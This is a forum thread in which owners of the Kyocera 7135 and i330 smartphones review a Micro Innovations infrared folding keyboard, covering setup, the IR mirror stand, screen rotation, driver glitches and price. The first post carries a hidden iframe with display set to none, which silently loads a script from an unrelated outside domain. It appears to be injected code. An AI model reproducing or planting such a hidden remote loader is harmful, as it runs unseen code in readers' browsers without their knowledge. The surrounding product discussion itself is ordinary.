+ Reply to Thread
Page 1 of 2 1 2 LastLast

Review: 7135 with Micro Innovations IR keyboard

Ok, I've had my keyboard for about a week now, so I figured I should write up a review for you guys.

Overall, I'm very happy with the keyboard. Installation is straight forward and setup is easy. The keyboard comes with a little stand for the phone/pda to sit on which has a mirror on it to reflect the IR beam down onto the IR port of the phone. The stand works quite well, and it folds flat and can be attached to the keyboard for handy storage/transportation. Though is does require a stable and flat surface to sit on.

Once you've installed the Palm app into the phone all you do to enable the keyboard is go into the W-Link application and tap a check box, then off you go. It warns you that beaming and hotsyncing won't work while the keyboard driver is enabled. I've also found that during a data call even if the driver is enabled, the keyboard won't work. It will work during voice calls though.

I found the keyboard to have a range of about 12" from the stand, as long as the mirror still has line of sight to the transmitter from the keyboard.

Typing on such a tiny keyboard takes a little getting used to, but once you're acclimated its no big deal. Punctuation and numbers require special modifier keys, and the keyboard is split in two. Through the use of the various modifiers the keyboard is fully featured however, including a standard number pad and "function" keys that you can program to launch any app on your Palm, in addition to the standard shortcut keys which will act just like the built in keys on the phone.

I'll take a couple of pics of the phone with the keyboard and post them later on.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Sorry, but I no longer make 7135 headset adapters.

PHO
    Broward County Florida, "Home of the Hanging Chad"
    how is the screen flip? have you tried it? it doesn't work on the i330 i assume because of the full screen nature - i had very bad luck using the stand and the i330 couldn't get the infra red to work effectivly
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

You mean rotating the screen? Can I do that with the 7135? If so, I don't know how. Post instructions and I'll try it. Though, given that the flip is oriented at an angle I don't know how well you'd be able to view it if the phone was sitting flat.

PHO
    i dont' have the 7135, but i imagine it flips out to almost flat - i have the i330

in the w-link app, where you click to enable the driver under neath there is Normal, Reverse, Left, and Right,

if you click on reverse it will put the screen upside down so you can turn the phone around and hvae the keyboard face the ir port and readeverything normally, or sideways - ect ect

this seems to be a real winning feature, if it works - on the i330 the graffiti part of hte screen seems to screw it up and send it into a writing loop.

plus their website tells you its not supported (for the i330)

Aaron
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

coolcat-

Where did you get the keyboard? When I checked out the Micro Innovations site I did not find a keyboard for the 7135.

I found a review of a similar Micro Innovations keyboard for a Pocket PC at

http://www.compu2go.com/pocketopkeyboard.html

I'm not sure if it's the same keyboard for the 7135 or not.

The reviewer did not like the keyboard for several reasons. One of the main ones was difficulty getting a good IR connection, but that might have been because of the Jornada they were using and may not be an issue for the 7135.

A couple of other things noted: the rubber feet did not hold well -- any comments coolcat?

Also, the reviewer found it difficult to use the punctuation keys, and the backspace key was particularly frustrating (too close to the launcher keys). Any similar difficulties, coolcat, or did you find it reasonable enough to use easily?

Thanks for the great info!

PHO

I have one

I have one of the keyboards, i have had it for a few days, but i am using it with the i330 -

i have had a hard time getting the IR connection especialy with the little mirror that comes with it. It seemed to wroko the first time i tried it, then not really again. But if you put the IR on the keyborad right up tot he phone IR its not bad - (which is why i asked about the screen flip)

THe typing action is not easy - but i have been able to adjust -

its tuff because the keyboard is TINY - so just like the screens on our palm phones, its a trade off, it fits nicely in your pocket but have to be more precise with your fingers -

i'll be using it with more frequency as i travle over the next 2 weeks, i'll post again with a further review -

ALSO - Tip, i am using this gel pad thing from office depot - its supposed to go on your dash and you can throw your cell phone on it and it wont slide (i live in florida, you have to be an idiot to leave your cell phone on your dash, it would melt)

what i use it for, is i carry a binder/ folder/ portfolio thing, i put the gel pad on top, my phone and the keyboard on it, so when i am typing on an unstable surface (my lap) it doesn't slide around

oh, another quirk i have found is - Well, when you want to use the keyboard you activate the driver for it so the IR port knows to look for it. Then when your done, it either times out, or you go in and deactivate it. Sometimes after i deactivate the keyboard at random hours later i'll get a pop up message sayign that the keyboard has timed out do i want to maintain the connection, more annoying than harmful as far as i can tell and makes me think it could be screwing something else up.

A

www.grtalk.com

Ok guys, I'm trying the screen flip thing now......

Sweet. It works great! The 7135 does not lay flat, so I've got it rotated so that the bottom of the screen is on the left of the phone. The phone then lays sideways just above the keyboard and it works like a charm! The screen is pointing a little to the right, since it doesn't lay flat. But hey! It works!

One more thing. I too found the phone giving me weird errors from the W-Link app at odd times. This first cropped up as I was typing with it the other day, it started giving me a warning that beaming could not be received while the driver was enabled. Well, no one was beaming to me, so I don't know if it was seeing some stray IR, if it was picking up my brother's TiBook across the table, or if it was just a bug. Then, later, it started wildly switching the driver on and off and on and off etc, etc, etc. I guess that its supposed to activate the driver if you hold the stylus on the graffiti area for 3 secs, well, I wasn't doing that but I guess it thought I was. Maybe a problem caused by my cheapo screen protectors? I moved the W-Link app from the internal memory to the card and that seems to have fixed that problem (I don't know why). The driver still works fine from the card.

Regarding the key layout. I don't have a problem with it, but then I've been touch typing since I was 10 (taught myself on an Apple IIe). And I have large hands too. The biggest problem I've had with it is the tab key, which is above the Q, and the odd key combinations to get punctuation (not . and , though).

I also tried using the screen rotated with the phone on the stand. This points it at me so I don't have to be looking straight down at it and it still get the IR signal just fine.

Any more questions?

So if I understand correctly, this wireless keyboard won't work while you have an online connection? If so, I'll continue to use my 6035's Stowaway keyboard and get the 7135 upgrade when I have my 7135, as at least I'll be able to use the keyboard while still online.

Originally posted by Lnoble
    coolcat-

Where did you get the keyboard? When I checked out the Micro Innovations site I did not find a keyboard for the 7135.
    I got it from CompUSA.com. Normal price $99.99, discounted to $59.99 with an additional $30 rebate. Total cost, $35 (shipping was $5).

Originally posted by Rambler
    So if I understand correctly, this wireless keyboard won't work while you have an online connection? If so, I'll continue to use my 6035's Stowaway keyboard and get the 7135 upgrade when I have my 7135, as at least I'll be able to use the keyboard while still online.
    That's correct, the IR port must be used or disabled during data connections, so the IR keyboard doesn't work when connected.

I couldn't pass it up for $35 though, and I'm sure I'd have spent much more than that on the Kyocera setup. Plus I'm wireless now, which is really nice.

Coolcat, are you using the default driver that came packaged with the keyboard? I had to get the updated driver for the keyboard to work correctly on my i300. The software updates can be found here. Yes, the Pocketop and Micro Innovations keyboard are one and the same product.

Originally posted by Chreotho
    I found a review of a similar Micro Innovations keyboard for a Pocket PC at

http://www.compu2go.com/pocketopkeyboard.html

I'm not sure if it's the same keyboard for the 7135 or not.
    Ok, I just read this review and I must say that I totally disagree.

The reviewer did not like the keyboard for several reasons. One of the main ones was difficulty getting a good IR connection, but that might have been because of the Jornada they were using and may not be an issue for the 7135.
    I have not had anywhere near the amount of trouble he describes holding an IR connection. If you understand how IR works, you won't have a problem. Using the little mirror you can have the phone standing up in the cradle, or with the screen rotated you don't even need the stand. It just works.

A couple of other things noted: the rubber feet did not hold well -- any comments coolcat?
    Yeah, first of all, the feet hold just fine. Second, he says that they are white. What? Even his pictures show that they are black! What a weirdo.

Also, the reviewer found it difficult to use the punctuation keys, and the backspace key was particularly frustrating (too close to the launcher keys). Any similar difficulties, coolcat, or did you find it reasonable enough to use easily?

Thanks for the great info!
    As I've already mentioned, it does take a little getting used to. The keyboard is extremely tiny, so you've got to expect that they'd need to use modifier command keys to fit everything in. I haven't had too much trouble with it though. I really like this keyboard. I think that it is very well made and a very good design.

I'll attach a couple pics for you guys.
    Attached Thumbnails Attached Thumbnails Review: 7135 with Micro Innovations IR keyboard-onstandsm.jpg  

This pic shows the phone on its side in the stand.
    Attached Thumbnails Attached Thumbnails Review: 7135 with Micro Innovations IR keyboard-landscapeonstandsm.jpg  

This pic shows the phone in landscape mode sitting above the keyboard.
    Attached Thumbnails Attached Thumbnails Review: 7135 with Micro Innovations IR keyboard-landscapesm.jpg  

This pic shows my hands on the keyboard, to give you an idea of how small it is. And still I love it and don't have a problem using it!
    Attached Thumbnails Attached Thumbnails Review: 7135 with Micro Innovations IR keyboard-handsonkeyssm.jpg  

Originally posted by JigSawMan
    Coolcat, are you using the default driver that came packaged with the keyboard? I had to get the updated driver for the keyboard to work correctly on my i300. The software updates can be found here. Yes, the Pocketop and Micro Innovations keyboard are one and the same product.
    Yes, I'm using the driver that came on the CD with the keyboard. I'll go check out the web site and see if there is a new version, though this version is working fine for me.

On a side note, I didn't get all of the additional hardware that is shown in the pictures from the review that was posted. IE, the custom stylus, etc. All I've got is the hardware to attach the stand to the keyboard when its folded. No big deal for me, as I wouldn't want to try dangling the keyboard off my phone anyway (it would only work on a Palm though I think).

I've got a crazy idea cooking to make a mirror attached to a stylus so that I don't have to use the stand if I want the phone in normal screen mode. Of course, I don't even need the mirror in landscape mode though.

Originally posted by coolcat
    This pic shows the phone in landscape mode sitting above the keyboard.
    Is landscape mode a feature of the 7135, or the software that comes with the keyboard? I haven't seen that before.

Is landscape mode a feature of the 7135, or the software that comes with the keyboard? I haven't seen that before.
    It is a feature of the keyboard software. It never worked successfully on my i300. Yet another reason for a new phone!

I've got version 1.0 of the software, that's what was on the CD. I see the new version is like 1.6 or something, but I'm having trouble downloading it. Could someone post it here?

Thanks!